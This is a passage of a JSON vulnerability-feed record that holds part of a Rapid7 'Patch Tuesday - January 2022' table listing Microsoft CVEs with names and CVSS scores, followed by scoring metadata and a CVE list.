Vulnerability | No | No | 7 | No \n[CVE-2022-21875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21875>) | Windows Storage Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21863>) | Windows StateRepository API Server file Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21874>) | Windows Security Center API Remote Code Execution Vulnerability | No | Yes | 7.8 | No \n[CVE-2022-21892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21892>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21958](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21958>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21959](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21959>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21960](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21960>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21961>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21962](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21962>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21963](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21963>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No 
| 6.4 | Yes \n[CVE-2022-21928](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21928>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.3 | Yes \n[CVE-2022-21867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21867>) | Windows Push Notifications Apps Elevation Of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21888](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21888>) | Windows Modern Execution Server Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2022-21881](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21881>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21879>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 5.5 | No \n[CVE-2022-21849](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21849>) | Windows IKE Extension Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-21901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21901>) | Windows Hyper-V Elevation of Privilege Vulnerability | No | No | 9 | Yes \n[CVE-2022-21847](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21847>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2022-21878](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21878>) | Windows Geolocation Service Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2022-21872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21872>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21839](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21839>) | Windows Event 
Tracing Discretionary Access Control List Denial of Service Vulnerability | No | Yes | 6.1 | No \n[CVE-2022-21868](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21868>) | Windows Devices Human Interface Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21921](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21921>) | Windows Defender Credential Guard Security Feature Bypass Vulnerability | No | No | 4.4 | No \n[CVE-2022-21906](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21906>) | Windows Defender Application Control Security Feature Bypass Vulnerability | No | No | 5.5 | No \n[CVE-2022-21852](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21852>) | Windows DWM Core Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21902](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21902>) | Windows DWM Core Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21896>) | Windows DWM Core Library Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21858>) | Windows Bind Filter Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21860](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21860>) | Windows AppContracts API Server Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21876](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21876>) | Win32k Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-21882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21882>) | Win32k Elevation of Privilege Vulnerability | No | No | 7 | Yes 
\n[CVE-2022-21887](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21887>) | Win32k Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-21873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21873>) | Tile Data Repository Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21861>) | Task Flow Data Engine Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21870>) | Tablet Windows User Interface Application Core Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21877>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-21894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21894>) | Secure Boot Security Feature Bypass Vulnerability | No | No | 4.4 | No \n[CVE-2022-21964](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21964>) | Remote Desktop Licensing Diagnoser Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-22947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-22947>) | Open Source Curl Remote Code Execution Vulnerability | No | Yes | nan | Yes \n[CVE-2022-21871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21871>) | Microsoft Diagnostics Hub Standard Collector Runtime Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21910](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21910>) | Microsoft Cluster Port Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No 
\n[CVE-2021-36976](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36976>) | Libarchive Remote Code Execution Vulnerability | No | Yes | nan | Yes \n[CVE-2022-21907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21907>) | HTTP Protocol Stack Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-21917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21917>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-21912](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21912>) | DirectX Graphics Kernel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-21898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21898>) | DirectX Graphics Kernel Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2022-21918](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21918>) | DirectX Graphics Kernel File Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2022-21865](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21865>) | Connected Devices Platform Service Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21869>) | Clipboard User Service Elevation of Privilege Vulnerability | No | No | 7 | No", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-11T21:41:56", "type": "rapid7blog", "title": "Patch Tuesday - 
January 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21907", "CVE-2021-22947", "CVE-2021-31166", "CVE-2021-36976", "CVE-2022-0096", "CVE-2022-0097", "CVE-2022-0098", "CVE-2022-0099", "CVE-2022-0100", "CVE-2022-0101", "CVE-2022-0102", "CVE-2022-0103", "CVE-2022-0104", "CVE-2022-0105", "CVE-2022-0106", "CVE-2022-0107", "CVE-2022-0108", "CVE-2022-0109", "CVE-2022-0110", "CVE-2022-0111", "CVE-2022-0112", "CVE-2022-0113", "CVE-2022-0114", "CVE-2022-0115", "CVE-2022-0116", "CVE-2022-0117", "CVE-2022-0118", "CVE-2022-0120", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21837", "CVE-2022-21838", "CVE-2022-21839", "CVE-2022-21840", "CVE-2022-21841", "CVE-2022-21842", "CVE-2022-21843", "CVE-2022-21846", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21855", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21887", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21891", 
"CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21911", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21917", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21929", "CVE-2022-21930", "CVE-2022-21931", "CVE-2022-21932", "CVE-2022-21954", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963", "CVE-2022-21964", "CVE-2022-21969", "CVE-2022-21970"], "modified": "2022-01-11T21:41:56", "id": "RAPID7BLOG:20364300767E58631FFE0D21622E63A3", "href": "https://blog.rapid7.com/2022/01/11/patch-tuesday-january-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}